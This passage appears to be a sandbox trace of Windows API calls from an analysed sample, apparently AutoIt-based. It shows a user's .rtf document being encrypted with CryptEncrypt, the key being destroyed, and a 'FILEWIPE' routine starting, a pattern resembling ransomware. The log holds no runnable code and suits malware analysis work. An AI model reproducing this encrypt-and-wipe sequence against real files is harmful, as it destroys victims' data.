wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0036.003] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0036.003] CryptEncrypt (in: hKey=0x7c2200, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0x1276b, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0x12770) returned 1 [0036.003] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.003] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.003] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0036.003] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.003] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.003] CharLowerBuffW (in: lpsz="byte[75633]", cchLength=0xb | out: lpsz="byte[75633]") returned 0xb [0036.003] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.006] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.006] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0036.006] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.006] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0036.006] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0036.007] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0036.007] CryptEncrypt (in: hKey=0x7c2200, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x88ffb0*, pdwDataLen=0x6ae220*=0x1276b, dwBufLen=0x12770 | out: pbData=0x88ffb0*, pdwDataLen=0x6ae220*=0x12770) returned 1 [0036.007] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.007] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.007] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0036.007] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.009] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.009] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.009] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.009] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0036.010] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1be8 | out: hHeap=0x770000) returned 1 [0036.010] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0036.010] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0036.010] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0036.010] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.010] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0036.010] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0036.010] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0036.010] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0036.010] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0036.010] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0036.010] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0036.010] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.010] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0036.010] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0036.010] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0036.010] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0036.010] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0036.010] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0036.010] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0036.010] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.015] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.015] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.015] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0036.015] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.019] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.019] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.019] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0036.019] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.019] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0036.020] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0036.020] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0036.020] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.020] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0036.020] PeekMessageW (in: lpMsg=0x6ae3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3fc) returned 0 [0036.020] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0036.020] CryptDestroyKey (hKey=0x7c2200) returned 1 [0036.020] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0036.020] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0036.020] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0036.020] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1698 | out: hHeap=0x770000) returned 1 [0036.020] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0036.020] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0036.020] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0036.020] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.020] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0036.020] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0036.020] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0036.020] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0036.020] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0036.020] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0036.020] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0036.020] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.020] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0036.021] PeekMessageW (in: lpMsg=0x6ae3d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3d4) returned 0 [0036.021] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0036.021] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2200 | out: hHeap=0x770000) returned 1 [0036.021] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0036.021] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0036.021] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0036.021] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0036.021] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0036.021] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.021] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0036.021] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17b0 | out: hHeap=0x770000) returned 1 [0036.021] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0036.021] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.021] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0036.021] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.021] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0036.021] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0036.021] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0036.021] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0036.021] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0036.021] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.022] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0036.022] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.022] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0036.022] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0036.022] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.022] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0036.022] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.022] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0036.022] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0036.022] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0036.022] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1738 | out: hHeap=0x770000) returned 1 [0036.022] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0036.022] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0036.022] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0036.022] CryptReleaseContext (hProv=0x7d5b30, dwFlags=0x0) returned 1 [0036.022] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.022] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0036.022] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.023] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0036.023] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0036.023] FreeLibrary (hLibModule=0x754b0000) returned 1 [0036.023] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0036.023] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17b0 | out: hHeap=0x770000) returned 1 [0036.023] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.023] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2200 | out: hHeap=0x770000) returned 1 [0036.023] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.023] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0036.023] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0036.023] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.023] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.024] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.024] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0036.024] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0036.024] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b98 | out: hHeap=0x770000) returned 1 [0036.024] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0036.024] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.025] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.025] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\XjUfY.rtf", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdd295210, ftCreationTime.dwHighDateTime=0x1d5bf96, ftLastAccessTime.dwLowDateTime=0x57e65cb0, ftLastAccessTime.dwHighDateTime=0x1d5bdb6, ftLastWriteTime.dwLowDateTime=0x57e65cb0, ftLastWriteTime.dwHighDateTime=0x1d5bdb6, nFileSizeHigh=0x0, nFileSizeLow=0x1276b, dwReserved0=0x0, dwReserved1=0x777648, cFileName="XjUfY.rtf", cAlternateFileName="")) returned 0x7c2240 [0036.025] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0036.025] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0036.025] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0036.025] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1968 | out: hHeap=0x770000) returned 1 [0036.025] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0036.025] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.025] CharLowerBuffW (in: lpsz="byte[75627]", cchLength=0xb | out: lpsz="byte[75627]") returned 0xb [0036.025] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.025] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0036.025] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0036.025] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0036.025] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.025] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0036.025] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0036.025] FreeLibrary (hLibModule=0x76b40000) returned 1 [0036.026] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0036.026] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0036.026] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0036.026] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1af8 | out: hHeap=0x770000) returned 1 [0036.026] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1dc8 | out: hHeap=0x770000) returned 1 [0036.026] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0036.026] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0036.026] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0036.026] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0036.026] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0036.026] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0036.026] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0036.026] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0036.026] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0036.026] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0036.026] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0036.026] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0036.026] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0036.026] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0036.026] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0036.026] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0036.026] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0036.026] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0036.026] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0036.026] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0036.026] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0036.026] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0036.026] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0036.026] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0036.026] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.026] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.026] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.027] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0036.027] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0036.027] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0036.027] PeekMessageW (in: lpMsg=0x6ae83c, 